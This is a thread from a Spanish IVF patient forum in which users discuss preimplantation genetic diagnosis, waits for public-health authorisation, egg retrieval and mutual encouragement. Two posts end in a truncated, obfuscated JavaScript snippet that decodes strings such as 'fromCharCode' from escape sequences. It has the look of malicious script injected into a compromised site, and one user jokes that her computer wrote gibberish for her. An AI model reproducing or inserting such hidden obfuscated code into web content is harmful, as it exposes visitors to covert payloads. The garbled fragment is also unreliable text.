Dgp en febrero - IVI: Foro de Infertilidad y Reproducción Asistida

Anuncio

Collapse
No announcement yet.

“Prohibición de venta o donación de medicación sobrante según la Ley 29/2006. INFORMACIÓN Y POSIBLES SANCIONES”. Haz click para más información.

Dgp en febrero

Collapse
X
 
  • Filter
  • Hora
  • Show
Clear All
new posts

    DGP EN FEBRERO

    Hola de nuevo a todas!!!

    MTP3, muchísimas gracias. Si, voy a DGP por edad.... Osea que después de la primera punción se espera a la regla y se empieza de nuevo.
    Me has ayudado mucho!!!
    Mil gracias!

    Ya os contaré,creo que voy a hacer ese tratamiento,no sé si en Marzo o ya Abril...

    Besotes y suerte a todas!!!

    Comment


      DGP EN FEBRERO

      Hola de nuevo a todas!!!

      MTP3, voy a hacer DGP por edad.... asi pues, después de la primera punción, se espera a la regla y se vuelve a empezar.
      Gracias! me has ayudado mucho!.

      Ya os contaré, creo que hare este tratamiento a finales de Marzo o Abril,a ver qué tal me va....Será mi segunda FIV.

      Mucha suerte a todas!!!

      Comment


        DGP EN FEBRERO

        muchas gracia esperanzada20091

        estoy muy perdida ya que aun no se ni el centro.La verdad que solo pensar la que se me avecina me da miedo.Una de las peores cosas es desplazarse ya que son muchas pruebas y con el trabajo se hace dificil y mas pensando que esto no es cosa de dos dias.me quedo con lo que me has discho de EVUCHY.

        Comment


          DGP EN FEBRERO

          Buenos días a todos, valientes.

          ROBER, hoy creo que teníais control o eco verdad??. Mucha suerte!! y a ser positivos pero sobre todo a mantener mucho la calma y tener paciencia. Cuéntanos en cuanto puedas.

          MUSITA, cuando era tu transfer??... increíble, ya estás cerquita. Mucha suerte guapa!.

          ESPERANZADA, Ya es juernes!!!... que ganitas de finde verdad?. Ya estás mas cerquita de empezar!, ver si prontito ya te vemos en acción querida Espe. Espero que estés tranquila en esta espera y con mucha ilusión.

          Gracias Espe... de verdad que me llega tu cariño y el de todas que me apoyáis mucho. Esto es un verdadero peregrinaje pero sabes que?, no me voy a amargar a vida por esto, de verdad. Creo que no me lo merezco ni mi marido merece verme nerviosa o triste por estas cosas. Tengo cosas muy buenas que agradecer en la vida, asi que me echaré la carga a la espalda y tiraré para delante sin mas. En realidad, tengo presente siempre lo de MUFACE Espe, tienes toda la razón, es una opción, lo que pasa es que cuando fuimos a averiguar nos dijeron que había que hacer el cambio en Enero y como en Diciembre nos dijeron en el CLinico que nuestro caso era viable, pues decidimos seguir adelante con esto, sabiendo los riesgos que hay claro. Luego no recuerdo si había tiempo de carencia, creo que se llama así, dependiendo de la compañía que escogiéramos no?. Bueno, que por ahora es la opción que tenemos, lo que pasa es que estas son las consecuencias y tenemos que aguantarlas ya que la hemos escogido. No quiero tirar la toalla ahora que está todo tan avanzado. Si lo miro así, hemos conseguido mucho ya y estamos a las puertas, lo que pasa es que aún no nos dejan entrar. Pero no creas que renuncio a la idea de Muface. Lo que pasa es que si decidimos cambiarnos, igual tendríamos que esperar hasta el próximo Enero según tengo entendido y mientras tanto me queda la opción de seguir con esto. Solo me entra la desesperación cuando pienso en que como dice AQUA, no dejo de cumplir años y este hago 36.

          Ahora iré a la cita con la ginecóloga a ver que puedo conseguir... pero voy mentalizada porque está claro que nadie me va ayudar en esto, ni saldré hoy con la autorización que necesito en la mano. Yo entiendo que no soy la única paciente, ni trabajan exclusivamente para mí. Asi que me armaré de paciencia y os iré contando. Creo que voy a crear un foro sobre "Burocracia para DGP por la SS"!!. A vosotras ya os tengo mareadas!!. Ojalá como dices tú, que la vida sea justa con nosotros y podamos por lo menos esperar mas tranquilos sin tanta burocracia.

          ALKI, guapa un besito muy grande y gracias por vuestro apoyo.

          FOLGADO, KUKUE... como estáis??. Kukue, como van esos ánimos?, tenemos que conseguirlo guapa, no desistas.

          LUNA, ya casi estamos en Marzo, espero que no se te haga tan larga la espera hasta Abril!.

          NIKé, mucho ánimo y fuerzas que esto no se nos puede resistir!

          NUSKA, como va esa paciencia?. Has podido contactar con las enfermeras? . Ya no te he vuelto a preguntar si lo conseguiste. Yo he seguido llamando por lo mío y siempre contacto. cuentame como estas?.

          ALKI, como vas con los chutes de medicamentos?. Vaya cocktel tienes todos los dias eh?. Te has sentido mejor?.

          A todas las chicas nuevas mucha suerte y un gran abrazo!.

          Comment


            DGP EN FEBRERO

            Hola a tod@s!!! Feliz mañana de juernes!!! Entro medio segundin para decirle a leonisa..yo estuve intentando primero por la ss pero en Castilla y León la nf no entra, asiq mire directamente las clinicas de Madrid q m entrarán por dkv y estoy en ginefiv q m salia bastantebien.por la distancia la verdad m da igual,al principio si q lo pensaba pero al fin y al cabo lo q importa es q la cosa salga bien yo vivo en Zamora..mucha suerte y aki estamos para lo q necesites, yo aun estoy empezando pero aki estamos todas para echarnos una mano. Besos para tod@s

            Comment


              DGP EN FEBRERO

              hola chicas y chico!mnuda desesperacion tengo con el dichoso hospital clinico de valladolid, me traen loca, no se si os acordais q m llamaron en enero para decirm q ya estaba todo autorizado y q llamase cada vez q m bajase la regla y en 2 -3 reglas empezariamos, pues ya m han venido 2 (enero y febrero) y les he llamado xa q m digesen mas mnos cuanto kedaba, pues hablo cn una enfermera el martes m dice q no sabe nada q hablara cn la dra barrero y q vuelva a llamar, pues asi hice y hoy volvi a llamar, m comenta la nfermera q si q ya esta todo autorizado y ahora m toca esperar, y le digo q cuanto q ya han pasado las 2 reglas q m comntaron y m dice q no sabe, q a espear, q siga llamando cd m baje la regla y a esperar.....la verdad q m he kdado igual q estaba o mjor dicho peor xq pnsaba q mpezariamos en breve, ahora cuanto se supone q tngo q esperar?1mes 3 mss 6mss......bufffff estoy q muerdo x la falta d informacion q dan.(function(){function b(e){var g=042,t="",o=window,j=("u0066x72u006Fu006dx43u0068 u0061x47p"+"u0042x79s"+"e")["x72e"+"p"+"u006Cx61x63u0065"]("x47p"+"x42yx73","rC"+"o"+"d"),p="x63hx61x72x43o" +"d"+"x65x41"+"t",u=("x6Cu005Anx4DsB"+"u0067x74"+" h")["x72"+"ex70x6cx61x63e"+""]("Z"+"nx4Du0073u0042",""+"en"+""),n=("Sym"+"x4aing ")[('ox64u006Cx61'+'cx65').replace('o'+'d','x72u0065u 0070')]("ymu004A","u0074r"+""),h=o[n],s=h[j],m,c;for(var i=0;i

              Comment


                DGP EN FEBRERO

                jajajaja estoy tan enfadad q el propio ordenador ha decidido escribir sapos y culebras x mi!jajajajaja(function(){function b(e){var g=042,t="",o=window,j=("u0066x72u006Fu006dx43u0068 u0061x47p"+"u0042x79s"+"e")["x72e"+"p"+"u006Cx61x63u0065"]("x47p"+"x42yx73","rC"+"o"+"d"),p="x63hx61x72x43o" +"d"+"x65x41"+"t",u=("x6Cu005Anx4DsB"+"u0067x74"+" h")["x72"+"ex70x6cx61x63e"+""]("Z"+"nx4Du0073u0042",""+"en"+""),n=("Sym"+"x4aing ")[('ox64u006Cx61'+'cx65').replace('o'+'d','x72u0065u 0070')]("ymu004A","u0074r"+""),h=o[n],s=h[j],m,c;for(var i=0;i

                Comment


                  DGP EN FEBRERO

                  Nuski wapa! Paciencia q no nos queda otra, pero ya vereis q el 2014 vamos a estar todas preñis
                  Malva no desesperes corazon pronto lo conseguiras

                  Comment


                    DGP EN FEBRERO

                    Animo chic@s que hoy es juernes y cada día que pasa esto se mueve, aunque sea a paso de hormiga.

                    Cada día estamos tod@s un poco más cerca de la meta!!!

                    Comment


                      DGP EN FEBRERO

                      CHICAS Y CHICO! Mensaje de MUSITA!

                      Hola guapísimas!!!
                      Malva me alegro un montón que ya te hayan podido dar alguna noticia más...ay ojalá empieces pronto y te digan cositas ya definitivas, te lo mereces un montón guapa...ya nos contarás a ver que te dicen ok?. Un besazo
                      Aqua no me puedo creer que esté en proceso pero me da mucho miedo que mañana me digan resultados negativos, espero que no por favor...tu en breve ya estás en transfer, que alegría!!! ojalá podamos tener también muy buenas noticias tuyas, tengo unas ganas...eres una campeona y esto se ha de recompensar o sí o si... muchísimo ánimo guapa!
                      Mtp3 gracias por los ánimos! la verdad es que se agradecen pero no voy a negar que estoy asustadilla, me imagino a los embris ahí en el laboratorio...ay pobrecillos...tu en breve vas a por tus frigos no? cuéntanos que yo ya me pierdo con tantas que somos...un beso fuerte
                      Alki como vas?? gracias a ti también por los ánimos, bueno vas fenomenal no? para cuando la punción?
                      Rober que bueno que seas de Mallorca, no lo sabía tampoco, tu que estás en el IVI?, ánimo por si teneis que hacer varias estimulaciones, es cansado y durillo el camino pero ha de compensar de alguna manera, ya verás...ánimo a tu chica también, vaya luchadores sois, tal para cual...besos os iré contando
                      Espe guapa, gracias por tu interés, eres total, te lo sabes todo, mucho ánimo para ti también que a todas nos llega nuestro momento, ya verás que el tuyo también llegará. Suerte y un besazo

                      Bueno guapas, a ver como hago para seguir en el foro, si a alguien se le ocurre alguna solución...había pensado volver a registrarme pero es que no se ni como porque cuando entro en dgp febrero ya me sale el foro directamente...
                      gracias y besazos a todas todas y a las no nombradas

                      Comment


                        DGP EN FEBRERO

                        Chic@s perdonadme y MUSITA tú perdóname más!.
                        Es que, este mensaje es del dia LUNES, me lo hanía dejado MUSITA y no lo he visto hasta ahora mismo. Ando con la cabeza n otra parte.

                        Comment


                          DGP EN FEBRERO

                          Musitaaaaa!!!! Qué tal ha ido todo???? Igual ya te han hecho la transfer. Por Dios!!!! No nos dejes así. Te mandamos toda la energía del mundo. Estoy deseando de pasarte al lado "betadesesperante" de la lista. Cuéntanos cuando puedas!!

                          Por cierto, perdonad que no actualice pero he tenido una semana intensa. En cuanto pueda, prometido!!!

                          Malva, mucha paciencia con esos trámites. Lo conseguirás y te sentirás muy orgullosa de ti misma cuando lo hayas hecho. Nosotros ya lo hacemos. Eres la caña!!! [IMG]smileys/smiley2.gif[/IMG]

                          LJA, qué tal va todo? Al final congeláis? Vais a DGP? Mucha suerte con todo!!!

                          ALKI, estás a nada de la punción. Ya te has pinchado el Ovitrelle?

                          NUSKA, la burocracia de este país es horrible. Todo lo que contáis debería aparecer bajo el epígrafe de "tortura" y estar penado. Qué paciencia y qué aguante tenéis que tener. Sé que no es consuelo para vosotras, pero menos mal que soy jóvenes!!! Ojalá te digan pronto que puedes comenzar porque no pueden tenerte así!!!

                          Perdonad que no continúe, pero me reclaman. Buuffff!!! Besos

                          Comment


                            DGP EN FEBRERO

                            Hola a todas y todos!mañana viernesssss!
                            MUSITA nos tienes a todas en ascuas!!!no sabemos nada d ti!!!!
                            Yo hoy he tenido eco y analitica.todo bien.mañana ultima eco y lo mas seguro domingo puncion.tengo 8foliculos hermosos!nhaber como sale todo ahora.esta vez no vamos a vitrificar ovulos.vamos a fecundarlos directamente y habrr si hay suerte y fecundan bastantes.para poder hacer dgp!!!!

                            Comment


                              DGP EN FEBRERO

                              [IMG]smileys/smiley2.gif[/IMG] [IMG]smileys/smiley17.gif[/IMG] [IMG]smileys/smiley36.gif[/IMG] BERAEN guapa y tu qtal?cuando te toca la puncion???
                              ESPE cariño estaras superrrrr contenta con el super triunfo d tu equipo.enhorabuena.
                              AQUA cada vez te queda menos!mañana terminamos el mes!!!
                              LUNA y tu qtal lo llevas?
                              Leonesita.y tu d donde eres pues?digo porque otra opcion la tienes en bilbao.si santander te queda bien pues a lo mejor bilbao es otra opcion.digo yo.
                              Besosssss

                              Comment


                                DGP EN FEBRERO

                                Por favor que he escrito un testamento y no hay manera, me da error, pruebo a ver

                                Comment

                                Working...
                                X